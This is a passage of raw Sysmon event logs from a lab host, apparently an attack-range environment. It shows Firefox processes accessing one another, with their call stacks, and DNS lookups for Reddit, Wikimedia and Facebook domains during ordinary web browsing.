Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000017614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.985{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.979{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.979{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.969{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.925{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.925{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.919{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.915{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.914{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.904{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.895{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.892{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.892{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.885{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.884{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.864{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.863{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.859{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.856{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.855{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000017594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:22.952{59A5CD1D-8E56-6005-2E00-00000000A301}2464192.174.198.91.in-addr.arpa.0type: 12 text-lb.esams.wikimedia.org;C:\Windows\sysmon64.exe 22542200x800000000000000017593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:21.952{59A5CD1D-8E56-6005-2E00-00000000A301}24645.20.240.157.in-addr.arpa.0type: 12 edge-atlas-shv-02-frt3.facebook.com;C:\Windows\sysmon64.exe 22542200x800000000000000017629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.681{59A5CD1D-945A-6005-3305-00000000A301}7052b.thumbs.redditmedia.com0type: 5 reddit.map.fastly.net;::ffff:151.101.113.140;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.680{59A5CD1D-945A-6005-3305-00000000A301}7052external-preview.redd.it0type: 5 reddit.map.fastly.net;::ffff:151.101.113.140;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.676{59A5CD1D-945A-6005-3305-00000000A301}7052styles.redditmedia.com0type: 5 reddit.map.fastly.net;::ffff:151.101.113.140;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.676{59A5CD1D-945A-6005-3305-00000000A301}7052preview.redd.it0type: 5 reddit.map.fastly.net;::ffff:151.101.113.140;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.671{59A5CD1D-945A-6005-3305-00000000A301}7052www.redditstatic.com0type: 5 reddit.map.fastly.net;::ffff:151.101.113.140;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:23.961{59A5CD1D-8E56-6005-2E00-00000000A301}2464140.113.101.151.in-addr.arpa.9003-C:\Windows\sysmon64.exe 10341000x800000000000000017623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:25.461{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:25.461{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:25.460{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000017620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:25.179{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:25.170{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:25.156{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program 